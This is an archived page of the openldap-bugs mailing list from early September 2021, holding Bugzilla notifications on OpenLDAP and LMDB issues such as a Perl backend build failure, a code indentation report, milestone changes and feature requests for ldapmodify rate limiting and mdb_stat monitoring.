https://bugs.openldap.org/show_bug.cgi?id=5540 Ondřej Kuzník <ondra(a)mistotebe.net> changed: What |Removed |Added ---------------------------------------------------------------------------- See Also| |https://bugs.openldap.org/s | |how_bug.cgi?id=9664 -- You are receiving this mail because: You are on the CC list for the issue.

1 0

[Issue 8341] Matching rules for 'namingContexts'
by openldap-its＠openldap.org 08 Sep '21

08 Sep '21

https://bugs.openldap.org/show_bug.cgi?id=8341 Ondřej Kuzník <ondra(a)mistotebe.net> changed: What |Removed |Added ---------------------------------------------------------------------------- See Also| |https://bugs.openldap.org/s | |how_bug.cgi?id=9664 -- You are receiving this mail because: You are on the CC list for the issue.

1 0

[Issue 6949] OpenLDAP Logging
by openldap-its＠openldap.org 07 Sep '21

07 Sep '21

https://bugs.openldap.org/show_bug.cgi?id=6949 Quanah Gibson-Mount <quanah(a)openldap.org> changed: What |Removed |Added ---------------------------------------------------------------------------- Resolution|TEST |--- Status|RESOLVED |CONFIRMED --- Comment #8 from Quanah Gibson-Mount <quanah(a)openldap.org> --- Need code to be shared between slapd and loadbalancer -- You are receiving this mail because: You are on the CC list for the issue.

1 0

[Issue 9665] New: wrong indentation in ldap_int_bisect_find
by openldap-its＠openldap.org 07 Sep '21

07 Sep '21

https://bugs.openldap.org/show_bug.cgi?id=9665 Issue ID: 9665 Summary: wrong indentation in ldap_int_bisect_find Product: OpenLDAP Version: unspecified Hardware: All OS: All Status: UNCONFIRMED Severity: normal Priority: --- Component: libraries Assignee: bugs(a)openldap.org Reporter: roland.illig(a)gmx.de Target Milestone: --- In abandon.c, ldap_int_bisect_find has an incorrectly indented if statement. I stumbled upon this due to a lint warning and immediately wondered who forgot to format the code again, probably after removing a redundant outer if statement or loop. The wrong indentation was introduced by https://git.openldap.org/openldap/openldap/-/commit/2660518c5d924b2b6377a87… in 2008. -- You are receiving this mail because: You are on the CC list for the issue.

1 5

[Issue 9663] New: Compilation problems: Perl backend
by openldap-its＠openldap.org 06 Sep '21

06 Sep '21

https://bugs.openldap.org/show_bug.cgi?id=9663 Issue ID: 9663 Summary: Compilation problems: Perl backend Product: OpenLDAP Version: 2.5.6 Hardware: x86_64 OS: Linux Status: UNCONFIRMED Severity: normal Priority: --- Component: backends Assignee: bugs(a)openldap.org Reporter: jb00356987(a)techmahindra.com Target Milestone: --- Dears, I try to compile 2.5.6 version with --enable-perl module but I get issue as following : first I get : In file included from init.c:18: perl_back.h:21:10: fatal error: EXTERN.h: No such file or directory #include <EXTERN.h> ^~~~~~~~~~ compilation terminated. make[3]: *** [Makefile:334: init.lo] Error 1 I had to install a missing rehl package (perl-devel.x86_64) and set the CPPFLAGS of the "configure utility" to the path of these header files. I did run "make clean" and restart the full comilation process then "make" goes futher but now I get a lot of entries as below then it stopped : /usr/app/LDAP/binaries/openldap-2.5.6/servers/slapd/back-perl/delete.c:50: undefined reference to `Perl_pop_scope' /usr/app/LDAP/binaries/openldap-2.5.6/servers/slapd/back-perl/delete.c:48: undefined reference to `Perl_sv_2iv_flags' /usr/app/LDAP/binaries/openldap-2.5.6/servers/slapd/back-perl/delete.c:50: undefined reference to `Perl_free_tmps' /usr/app/LDAP/binaries/openldap-2.5.6/servers/slapd/back-perl/delete.c:36: undefined reference to `Perl_stack_grow' /usr/app/LDAP/binaries/openldap-2.5.6/servers/slapd/back-perl/delete.c:34: undefined reference to `Perl_markstack_grow' /usr/app/LDAP/binaries/openldap-2.5.6/servers/slapd/back-perl/delete.c:35: undefined reference to `Perl_stack_grow' /usr/app/LDAP/binaries/openldap-2.5.6/servers/slapd/back-perl/delete.c:45: undefined reference to `Perl_croak_nocontext' /usr/app/LDAP/binaries/openldap-2.5.6/servers/slapd/back-perl/delete.c:28: undefined reference to `Perl_croak_nocontext' collect2: error: ld returned 1 exit status make[2]: *** [Makefile:527: slapd] Error 1 Any idea of what's the issue ? Configure used : ./configure --enable-modules --enable-ldap --enable-dynlist --enable-ppolicy --enable-unique --with-gnu-ld --enable-refint --with-tls --enable-dynamic --enable-valsort --enable-perl --enable-rwm Thx, Jean-Luc. -- You are receiving this mail because: You are on the CC list for the issue.

1 6

[Issue 9662] New: Error while adding user/group in openldap
by openldap-its＠openldap.org 02 Sep '21

02 Sep '21

https://bugs.openldap.org/show_bug.cgi?id=9662 Issue ID: 9662 Summary: Error while adding user/group in openldap Product: OpenLDAP Version: 2.4.56 Hardware: x86_64 OS: Linux Status: UNCONFIRMED Severity: normal Priority: --- Component: slapd Assignee: bugs(a)openldap.org Reporter: is3871(a)att.com Target Milestone: --- Created attachment 837 --> https://bugs.openldap.org/attachment.cgi?id=837&action=edit Error details Error while adding user/group in openldap adding new entry "dc=ajp,dc=att,dc=com" ldap_add: Server is unwilling to perform (53) additional info: no global superior knowledge -- You are receiving this mail because: You are on the CC list for the issue.

1 2

[Issue 8375] paged results control results in full db search?
by openldap-its＠openldap.org 02 Sep '21

02 Sep '21

https://bugs.openldap.org/show_bug.cgi?id=8375 Quanah Gibson-Mount <quanah(a)openldap.org> changed: What |Removed |Added ---------------------------------------------------------------------------- Keywords|needs_review | Target Milestone|2.7.0 |2.6.1 -- You are receiving this mail because: You are on the CC list for the issue.

1 0

[Issue 8255] slapd-sock: response parsing in str2result() is broken
by openldap-its＠openldap.org 02 Sep '21

02 Sep '21

https://bugs.openldap.org/show_bug.cgi?id=8255 Quanah Gibson-Mount <quanah(a)openldap.org> changed: What |Removed |Added ---------------------------------------------------------------------------- Target Milestone|2.7.0 |2.6.1 -- You are receiving this mail because: You are on the CC list for the issue.

1 0

[Issue 9651] New: Add some kind of rate limiting option to ldapmodify
by openldap-its＠openldap.org 02 Sep '21

02 Sep '21

https://bugs.openldap.org/show_bug.cgi?id=9651 Issue ID: 9651 Summary: Add some kind of rate limiting option to ldapmodify Product: OpenLDAP Version: 2.5.6 Hardware: All OS: All Status: UNCONFIRMED Severity: enhancement Priority: --- Component: client tools Assignee: bugs(a)openldap.org Reporter: hyc(a)openldap.org Target Milestone: --- When using ldapmodify to replay a testing workload it would be useful to be able to specify a request rate, instead of just performing multiple operations in immediate succession. As a simpler alternative, just being able to specify a time interval between operations would be helpful. As an even greater future enhancement, it would be nice to have an option to replay an accesslog.ldif directly, using its embedded timestamps to control the time interval between operations. Currently this isn't feasible since reqstart timestamps only have 1-second granularity, the fraction part is a linear counter and not a microsecond value. The reqStart fraction would need to be extended to 9 decimal places with full nanosecond resolution in order to be usable as actual fractional time. We already know that microsecond resolution is insufficient to avoid frequent collisions. -- You are receiving this mail because: You are on the CC list for the issue.

1 3

[Issue 9661] New: How to monitor an LDMB file for being pretty full
by openldap-its＠openldap.org 02 Sep '21

02 Sep '21

https://bugs.openldap.org/show_bug.cgi?id=9661 Issue ID: 9661 Summary: How to monitor an LDMB file for being pretty full Product: LMDB Version: unspecified Hardware: All OS: All Status: UNCONFIRMED Severity: normal Priority: --- Component: liblmdb Assignee: bugs(a)openldap.org Reporter: dpa-openldap(a)aegee.org Target Milestone: --- https://ltb-project.org/documentation/nagios-plugins/check_lmdb_usage provides a Nagios plugin, to check how full/free a LMDB database is. It calls mbd_stat -ef, and parses from the output the numbers in the “Max pages:”, “Number of pages used:”, and “Free pages:” lines. With these numbers it calculates “the percent of used pages” or “the percent of free pages” and signals the status with return values 0 -OK, 1 - warning, or 2 - critical . The disadvantage of check_lmdb_usage is, that it requires perl. Do you recommend to monitor the absolute number of free pages, the relative number of free pages, the absolute number of used pager, or the relative number of used pages? Please extend mdb_stat to be suitable for monitoring the fullness of a LMDB directory - accept parameters of for a warning and critical threshold, and a parameter on how to calculate the criterion (A - based on absolute number of free pages, B - relative number of free pages, C - absolute number of used pages, or D - relative number of used pages). -- You are receiving this mail because: You are on the CC list for the issue.

1 4

[Issue 8375] paged results control results in full db search?
by openldap-its＠openldap.org 01 Sep '21

01 Sep '21

https://bugs.openldap.org/show_bug.cgi?id=8375 --- Comment #7 from geert.hendrickx(a)telenetgroup.be <geert.hendrickx(a)telenetgroup.be> --- I can reproduce it on any sufficiently large db, both tree-structured or flat, given the right search scope. -- You are receiving this mail because: You are on the CC list for the issue.

1 0

[Issue 8375] paged results control results in full db search?
by openldap-its＠openldap.org 01 Sep '21

01 Sep '21

https://bugs.openldap.org/show_bug.cgi?id=8375 Quanah Gibson-Mount <quanah(a)openldap.org> changed: What |Removed |Added ---------------------------------------------------------------------------- Keywords| |needs_review --- Comment #6 from Quanah Gibson-Mount <quanah(a)openldap.org> --- I'll put needs review on it though so we can discuss. ;) -- You are receiving this mail because: You are on the CC list for the issue.

1 0

[Issue 8375] paged results control results in full db search?
by openldap-its＠openldap.org 01 Sep '21

01 Sep '21

https://bugs.openldap.org/show_bug.cgi?id=8375 --- Comment #5 from Quanah Gibson-Mount <quanah(a)openldap.org> --- (In reply to geert.hendrickx(a)telenetgroup.be from comment #4) > Hi > > I can reproduce exactly the same behaviour with OpenLDAP 2.5.7, on a freshly > slapadd'ed mdb. Target milestone for the fix is 2.7.0, so that's expected. ;) -- You are receiving this mail because: You are on the CC list for the issue.

1 0

[Issue 8375] paged results control results in full db search?
by openldap-its＠openldap.org 01 Sep '21

01 Sep '21

https://bugs.openldap.org/show_bug.cgi?id=8375 --- Comment #4 from geert.hendrickx(a)telenetgroup.be <geert.hendrickx(a)telenetgroup.be> --- Hi I can reproduce exactly the same behaviour with OpenLDAP 2.5.7, on a freshly slapadd'ed mdb. -- You are receiving this mail because: You are on the CC list for the issue.

1 0

2025

2024

2023

2022

2021

2020

2019

2018

2017

2016

2015

2014

2013

2012

2011

2010

2009

2008

2007

2006

openldap-bugs